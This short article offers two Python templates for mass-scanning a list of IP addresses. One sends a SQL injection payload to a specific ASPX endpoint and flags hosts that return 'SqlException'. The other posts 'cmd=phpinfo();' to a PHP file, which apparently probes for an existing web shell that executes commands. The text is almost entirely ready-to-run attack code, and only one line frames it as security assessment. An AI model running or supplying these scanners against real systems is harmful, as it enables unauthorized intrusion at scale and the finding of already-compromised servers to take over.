Batch Vulnerability Testing Scripts for GET and POST Requests
Tech
2
Batch vulnerability testing is esential for security assessments to validate potential issues efficient. This article provides templates for GET and POST requests to automate this process.
GET Request Batch Script
This script reads IP addresses from a file and sends GET requests to test for vulnerabilities. Modify the URL and condition checks based on the specific vulnerability response.
import requests
with open('targets.txt', 'r') as file:
addresses = file.readlines()
counter = 1
for addr in addresses:
addr = addr.strip()
try:
target_url = f'http://{addr}/client/messageurl.aspx?user=%27%20and%20(select%20db_name())>0--&pwd=1'
response = requests.get(target_url, timeout=2)
response.encoding = response.apparent_encoding
content = response.text
if 'SqlException' in content:
print(f'Vulnerability {counter}: {target_url}')
counter += 1
except Exception:
continue
POST Request Batch Script
For vulnerabilities requiring POST requests, use this script. Adjust headers, data payloads, and response checks as needed.
import requests
with open('targets.txt', 'r') as file:
addresses = file.readlines()
counter = 1
for addr in addresses:
addr = addr.strip()
try:
target_url = f'http://{addr}/20mm85.php'
headers = {
'Cookie': '',
'User-Agent': 'Mozilla/5.0'
}
payload = {'cmd': 'phpinfo();'}
result = requests.post(target_url, headers=headers, data=payload, timeout=2)
content = result.content.decode('utf-8')
if 'phpinfo' in content:
print(f'Vulnerability {counter}: {target_url}')
counter += 1
except Exception:
continue
